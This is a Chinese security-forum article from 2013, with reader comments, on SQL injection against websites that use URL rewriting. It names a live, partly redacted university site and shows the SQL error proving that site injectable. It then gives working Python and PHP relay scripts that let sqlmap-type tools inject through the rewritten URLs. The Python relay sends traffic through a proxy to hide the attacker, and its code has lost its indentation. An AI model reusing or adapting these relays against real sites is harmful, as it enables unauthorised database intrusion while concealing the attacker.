<main class="main-container ng-scope" ng-view=""><div class="main receptacle post-view ng-scope"><article class="entry ng-scope" ng-controller="EntryCtrl" ui-lightbox=""><header><h1 class="entry-title ng-binding">python脚本处理伪静态注入</h1><div class="entry-meta"><a target="_blank" class="author name ng-binding">livers</a> <span class="bull">·</span> <time title="2013/05/27 17:50" ui-time="" datetime="2013/05/27 17:50" class="published ng-binding ng-isolate-scope">2013/05/27 17:50</time></div></header><section class="entry-content ng-binding" ng-bind-html="postContentTrustedHtml"><p>目前有很多网站做了rewrite.<pre><code>/?id=1

/1

/1111.php
</code></pre>通常情况下，动态脚本的网站的url类似下面这样 http://www.xxoo.net/aa.php?id=123 做了伪静态之后类似这样 http://www.xxoo.net/aa.php/id/123.html 总归大趋势下，攻击的门槛逐渐增高。这样有利有弊，喜欢研究的会深入钻研，另一方面只会用工具不懂原理的则充斥到大小论坛水区。 实战举例： <a href="http://www.bxxxxxxxxxxxx.edu/magazine/index.php/mxxxxia/gallery/dickinsons-last-dance/1">http://www.bxxxxxxxxxxxx.edu/magazine/index.php/mxxxxia/gallery/dickinsons-last-dance/1</a> 这个点存在注入<pre><code>Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1dddddd, 1' at line 4
</code></pre>标准的显错注入。 这里测试了几个工具havij <a href="http://www.bxxxxxxxxxxxx.edu/magazine/index.php/mxxxxia/gallery/dickinsons-last-dance/1">http://www.bxxxxxxxxxxxx.edu/magazine/index.php/mxxxxia/gallery/dickinsons-last-dance/1</a> sqlmap safe3 穿山甲 此上都无法直接注入。 这里借助注入中转实现： 中转工具有一些   win7下会遭遇各种奇葩问题。并linux下不能使用。 用python  code了一篇，为什么用python 因为他开发快，不用各种环境。<pre><code>from BaseHTTPServer import *  
import urllib2  
class MyHTTPHandler(BaseHTTPRequestHandler):  
def do_GET(self):  
path=self.path  
path=path[path.find('id=')+3:]  
proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"})  
opener = urllib2.build\_opener(proxy\_support)  
urllib2.install_opener(opener)  
url="http://www.xxxxxxxxxxxxx.edu/magazine/imedia/gallery/dickinsons-last-dance/"  
try:  
response=urllib2.urlopen(url+path)  
html=response.read()  
except urllib2.URLError,e:  
html=e.read()  
self.wfile.write(html)  
server = HTTPServer(("", 8000), MyHTTPHandler)  
server.serve_forever()
</code></pre>不到20行代码（并加入了 goagent代理for hidden ）。 已经实现了要求。 <a href="http://127.0.0.1:8000/?id=1">http://127.0.0.1:8000/?id=1</a> 从而达到目的。相比构造自己脚本去执行sql注入语句，要高效的多。</p><hr>给习惯用php的朋友添加一个php脚本的中转注入： 可以自定义需要的头信息，在需要cookie或者refer等位置都可以方便的添加，添加好后直接访问zhongzhuan.php?id=1然后就可以放到工具中注入了，十分方便 :)<pre><code>&lt;?php
set_time_limit(0); 
$id=$_GET["id"]; 
$id=str_replace(" ","%20",$id); 
$id=str_replace("=","%3D",$id); 
$cookie="test";
$url = "http://www.qq.com/index.php/id/{$id}.html"; 
//$postdata = "";

$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, "$url"); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
curl_setopt($ch, CURLOPT_COOKIE, "$cookie");
// curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
// curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);//post的数据
$output = curl_exec($ch); 
curl_close($ch); 
print_r($output);
?&gt;
</code></pre><p></p></section></article><div class="entry-controls clearfix"><div style="float:left;color:#9d9e9f;font-size:15px"><span>&copy;乌云知识库版权所有 未经许可 禁止转载</span></div></div><div class="yarpp-related"><h3>为您推荐了适合您的技术文章:</h3><ol id="recommandsystem"><li><a href="http://drops.wooyun.org/tips/85" rel="bookmark" id="re1">给CISCO设备中后门的方法--TCL 以及路由安全</a></li><li><a href="http://drops.wooyun.org/tools/601" rel="bookmark" id="re2">跑wordpress用户密码脚本</a></li><li><a href="http://drops.wooyun.org/tips/870" rel="bookmark" id="re3">hackyou2014 CTF web关卡通关攻略</a></li><li><a href="http://drops.wooyun.org/papers/501" rel="bookmark" id="re4">CVE-2012-0053详解</a></li></ol></div><div id="comments" class="comment-list clearfix"><div id="comment-list"><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">iPython</span> <span class="reply-time">2016-01-06 13:50:25</span></div><p></p><p>from BaseHTTPServer import *</p><p>看着这种也头疼</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">枯荣</span> <span class="reply-time">2015-08-06 10:36:51</span></div><p></p><p>mark</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">BeenQuiver</span> <span class="reply-time">2015-01-21 13:53:28</span></div><p></p><p>好工具</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Stephone</span> <span class="reply-time">2014-08-06 17:08:55</span></div><p></p><p>mark</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">黄小昏</span> <span class="reply-time">2013-09-26 09:34:52</span></div><p></p><p>马克</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">酱油甲</span> <span class="reply-time">2013-08-26 17:40:02</span></div><p></p><p>sqlmap可以指定位置进行注入，不一定要参数</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">乌拉拉</span> <span class="reply-time">2013-07-12 17:06:08</span></div><p></p><p>havij用 %Inject_Here%了没</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">10457793</span> <span class="reply-time">2013-06-18 11:29:29</span></div><p></p><p>好厉害</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Demon</span> <span class="reply-time">2013-05-30 17:38:10</span></div><p></p><p>这python代码缩进都没。。看的头疼</p><p></p></div></div></div></div></div></main>